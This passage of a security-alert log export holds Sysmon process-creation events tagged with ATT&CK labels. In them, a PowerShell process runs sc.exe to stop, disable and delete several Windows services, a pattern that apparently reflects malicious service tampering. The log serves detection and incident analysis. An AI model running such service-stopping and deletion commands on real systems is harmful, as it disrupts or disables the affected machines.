Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.582 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00102c4f2100} +ProcessId: 6008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.583986800Z"",""eventRecordID"":""2728"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.582\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00102c4f2100}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.582"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00102c4f2100}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.760",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.544 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00103b4c2100} +ProcessId: 2872 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.546997700Z"",""eventRecordID"":""2725"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.544\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00103b4c2100}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.544"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00103b4c2100}"",""processId"":""2872"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.733",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.529 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010e84a2100} +ProcessId: 4752 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ALGM Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config ALGM Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.532792600Z"",""eventRecordID"":""2724"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.529\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010e84a2100}\r\nProcessId: 4752\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config ALGM Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.529"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010e84a2100}"",""processId"":""4752"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config ALGM Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.697",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.505 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010cc482100} +ProcessId: 4976 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.507517400Z"",""eventRecordID"":""2722"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.505\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010cc482100}\r\nProcessId: 4976\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.505"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010cc482100}"",""processId"":""4976"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.641",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.457 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010aa452100} +ProcessId: 4716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.461883300Z"",""eventRecordID"":""2719"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.457\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010aa452100}\r\nProcessId: 4716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.457"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010aa452100}"",""processId"":""4716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.606",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.429 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00104a432100} +ProcessId: 2112 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.432717800Z"",""eventRecordID"":""2717"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.429\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00104a432100}\r\nProcessId: 2112\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.429"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00104a432100}"",""processId"":""2112"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.588",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.415 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001019422100} +ProcessId: 876 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 